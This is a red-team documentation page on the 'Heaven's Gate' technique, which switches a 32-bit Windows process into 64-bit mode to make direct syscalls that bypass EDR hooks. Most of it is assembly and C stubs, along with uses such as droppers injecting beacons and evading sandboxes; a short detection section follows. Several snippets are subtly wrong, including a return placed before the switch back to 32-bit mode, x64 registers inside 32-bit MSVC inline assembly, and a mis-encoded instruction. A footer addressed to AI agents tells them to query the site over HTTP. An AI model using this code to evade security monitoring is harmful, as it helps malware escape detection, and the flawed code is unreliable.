# Heaven's Gate — Calling 64-bit Code from a 32-bit Process

### Introduction to WOW64

Windows runs 32-bit applications on 64-bit systems through the **WOW64** subsystem (Windows 32-bit on Windows 64-bit). This subsystem emulates the 32-bit environment, allowing x86 binaries to execute on AMD64 systems without modification.

When a 32-bit process runs under WOW64, it operates in a hybrid state:

* The **virtual address space** is 32-bit (up to 4 GB, typically 2 GB user-accessible)
* The **kernel** remains in pure 64-bit mode
* WOW64 intercepts kernel calls and translates them from 32-bit to 64-bit

```
┌──────────────────────────────────────────────────────────────────────┐
│               WOW64 Architecture — Internal View                     │
│                                                                      │
│  32-bit process:                                                     │
│  ┌─────────────────────────────────────────────────────────────┐    │
│  │  x86 code (32-bit)                                          │    │
│  │  ntdll32.dll (32-bit) — 32-bit native API                  │    │
│  │  wow64.dll — call thunking and translation                  │    │
│  │  wow64win.dll — GUI call thunking                           │    │
│  │  wow64cpu.dll — transition to 64-bit mode                   │    │
│  └─────────────────────────────────────────────────────────────┘    │
│                            │                                         │
│                     wow64cpu!BTCpuSimulate                           │
│                            │                                         │
│           ┌────────────────▼───────────────────┐                    │
│           │   Far jump to CS:0x33               │                    │
│           │   (switches CPU to 64-bit Long Mode)│                    │
│           └────────────────────────────────────┘                    │
│                            │                                         │
│  ┌─────────────────────────▼───────────────────────────────────┐    │
│  │  64-bit kernel (NT Executive)                               │    │
│  │  ntoskrnl.exe executes the syscall in native 64-bit mode    │    │
│  └─────────────────────────────────────────────────────────────┘    │
└──────────────────────────────────────────────────────────────────────┘
```

**Heaven's Gate** is the technique of exploiting this 32-to-64-bit mode transition inside a WOW64 process to execute 64-bit code directly — bypassing the WOW64 thunking layer entirely.

***

### Why This Is Useful for Evasion

EDRs that hook APIs typically install two sets of hooks:

* One for 64-bit processes (in the 64-bit `ntdll.dll`)
* One for 32-bit processes (in the 32-bit `ntdll.dll`, via WOW64)

When a 32-bit process uses Heaven's Gate to call 64-bit syscalls directly, it completely bypasses the 32-bit EDR hook layer. The syscalls reach the kernel directly in 64-bit mode, as if they originated from a native 64-bit process.

```
┌──────────────────────────────────────────────────────────────────────┐
│              Heaven's Gate — Bypassing 32-bit Hooks                  │
│                                                                      │
│  NORMAL FLOW (32-bit process):                                       │
│  32-bit code → ntdll32!NtAllocateVirtualMemory →                    │
│    [EDR 32-bit hook] → wow64.dll thunk → 64-bit syscall             │
│                                                                      │
│  HEAVEN'S GATE:                                                      │
│  32-bit code → far jmp CS:0x33 → 64-bit mode →                     │
│    64-bit syscall directly to kernel                                 │
│    [32-bit hooks COMPLETELY bypassed]                                │
└──────────────────────────────────────────────────────────────────────┘
```

***

### The Mechanism: Far Jump with CS:0x33

In x86-64, the code segment selector controls the CPU's operating mode:

* `CS = 0x23`: 32-bit mode (compatibility mode)
* `CS = 0x33`: 64-bit mode (long mode)

A *far jump* targeting a different selector (`jmp far 0x33:address`) causes the CPU to transition to the corresponding mode. WOW64 uses exactly this mechanism internally when moving between modes.

#### x86 Assembly Implementation (32-bit)

```nasm
; heaven_gate.asm — 32→64-bit transition stub
; Assemble as 32-bit

section .text
global _DoHeavensGate

; Macro that issues a far jump into 64-bit mode
; Destination: label immediately after the far jump
%macro HEAVENS_GATE 0
    ; Manually encoded far jump (6 bytes)
    ; EA xx xx xx xx 33 00
    ; 0xEA = far jmp opcode
    ; xx xx xx xx = 32-bit destination address
    ; 33 00 = CS selector (0x33 = 64-bit long mode)
    db 0xEA
    dd _x64_code    ; address of the 64-bit code
    dw 0x0033       ; CS = 0x33 (64-bit mode)
_x64_code:
%endmacro

; Executes NtAllocateVirtualMemory as a 64-bit syscall
; from inside a 32-bit process
_DoHeavensGate:
    push ebp
    mov  ebp, esp

    ; Set up arguments for 64-bit calling convention
    ; (shadow space + register arguments per x64 ABI)

    HEAVENS_GATE    ; Transition to 64-bit mode

    ; === Now in 64-bit mode ===
    ; SSN for NtAllocateVirtualMemory (Windows 10 x64)
    mov r10, rcx
    mov eax, 0x18   ; SSN
    syscall         ; Direct call to 64-bit kernel
    ret             ; Return in 64-bit mode

    ; Return to 32-bit mode: far jump back to CS:0x23
    db 0xEA
    dd _back32
    dw 0x0023
_back32:
    pop ebp
    ret
```

#### C Implementation with Inline Assembly (MSVC)

For use in C with a 32-bit MSVC compiler:

```c
#include <windows.h>

// Transition to 64-bit mode and execute a syscall
// Returns NTSTATUS
NTSTATUS HeavensGateSyscall(
    DWORD ssn,           // System Service Number (64-bit)
    PVOID param1,
    PVOID param2,
    ULONG_PTR param3,
    PVOID param4,
    ULONG param5,
    ULONG param6
) {
    NTSTATUS result = 0;

    __asm {
        ; Push arguments onto the stack for 64-bit calling convention
        push param6
        push param5
        push param4
        push param3
        push param2
        push param1

        ; Far call to 64-bit mode (CS = 0x33)
        ; Use RETF trick: push target address then CS selector,
        ; then execute a far return to jump into long mode
        call _get_rip
        _get_rip:
        pop eax
        add eax, 5
        push 0x33
        push eax
        _emit 0xCB  ; RETF — changes CS to 0x33 (64-bit)

        ; === NOW IN 64-BIT MODE ===
        mov r10, rcx
        mov eax, ssn
        syscall

        ; Return to 32-bit mode
        push 0x23
        _emit 0xE8
        _emit 0x00
        _emit 0x00
        _emit 0x00
        _emit 0x00
        add [esp], 9
        push 0x23
        _emit 0xCB  ; RETF back to CS:0x23 (32-bit)

        mov result, eax
    }

    return result;
}
```

#### Runtime-Generated Stub Approach

The most practical approach generates the Heaven's Gate stub at runtime as a raw byte buffer:

```c
#include <windows.h>

typedef NTSTATUS (WINAPI* HeavensGateFn)(
    HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG
);

// Build a Heaven's Gate stub for NtAllocateVirtualMemory (64-bit)
HeavensGateFn CreateHeavensGateStub(DWORD ssn) {
    // Stub byte sequence:
    // 32-bit prologue, transition to 64-bit, execute syscall, return
    unsigned char stub[] = {
        // 32-bit prologue
        0x55,                         // push ebp
        0x89, 0xEC,                   // mov ebp, esp

        // For a complete inline transition, use a separate
        // assembly file — this example shows the 64-bit syscall body
        // that executes after the far jump is handled externally.

        // NtAllocateVirtualMemory syscall (64-bit)
        0x4C, 0x8B, 0xD1,            // mov r10, rcx
        0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, SSN (filled at runtime)
        0x0F, 0x05,                   // syscall
        0xC3,                         // ret
    };

    // Patch in the SSN
    *(DWORD*)(stub + 7) = ssn;

    PVOID pStub = VirtualAlloc(NULL, sizeof(stub),
                                MEM_COMMIT | MEM_RESERVE,
                                PAGE_EXECUTE_READWRITE);
    if (!pStub) return NULL;

    memcpy(pStub, stub, sizeof(stub));
    return (HeavensGateFn)pStub;
}
```

***

### Practical Use Cases

Heaven's Gate appears in:

1. **32-bit loaders for 64-bit payloads**: A 32-bit dropper (easier to obfuscate) injects a 64-bit payload using native syscalls.
2. **Bypassing hooks in legacy EDRs**: EDRs that only install 32-bit hooks are completely blind to this path.
3. **Anti-analysis**: Sandboxes that only emulate 32-bit code cannot follow execution into 64-bit code triggered via Heaven's Gate.

```
┌──────────────────────────────────────────────────────────────────────┐
│              Heaven's Gate Applications in Red Teaming               │
│                                                                      │
│  1. Office VBA dropper (32-bit) injects a 64-bit beacon             │
│     • VBA/VBScript runs in a 32-bit host (mshta.exe)               │
│     • 64-bit shellcode injected via Heaven's Gate                   │
│     • EDR monitoring only the 32-bit side is blind                  │
│                                                                      │
│  2. Bypassing userland hook stacks                                   │
│     • 32-bit userland hooks are completely ignored                   │
│     • Only kernel callbacks (PsSetCreateThreadNotify) still fire    │
│       — but those are mode-agnostic                                 │
│                                                                      │
│  3. Cross-architecture injection                                     │
│     • 32-bit process creates threads in 64-bit processes            │
│       using handles and 64-bit APIs accessed via Heaven's Gate      │
└──────────────────────────────────────────────────────────────────────┘
```

***

### Limitations

* Requires the process to run under WOW64 (32-bit on a 64-bit OS)
* Does not work on natively 32-bit systems (e.g., Windows XP x86)
* Modern EDRs install hooks in both 32-bit and 64-bit ntdll — Heaven's Gate only bypasses the 32-bit set
* Correctly managing the stack across mode transitions requires extreme care to avoid corruption

***

### Detection

* **Code segment analysis**: EDRs with kernel drivers can detect unexpected CS transitions via thread context inspection
* **Far jump opcode scanning**: Hunting for `0xEA` (far jmp) or `RETF` in userland code
* **Call correlation**: A 64-bit syscall with a 32-bit call stack is a detectable anomaly

***

### References

* Roy G. Biv (Barnaby Jack), "Heaven's Gate" — 2011 (original concept)
* ReWolf, "x86/x64 Hybrid Shellcode" — rewolf.pl (2012)
* Alex Ionescu, "Windows WOW64 Internals" — RECON 2015
* Hexacorn, "Heaven's Gate for Malware Developers" — hexacorn.com
* ired.team, "Heaven's Gate — Calling x64 Code from x86 Process" — ired.team
* NETSPI, "Heaven's Gate: 32-bit Process to 64-bit Syscalls" — netspi.com (2021)
* Windows Internals 7th Edition, "WOW64 Architecture"


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.redteamleaders.com/offensive-security/defense-evasion/heavens-gate-calling-64-bit-code-from-a-32-bit-process.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
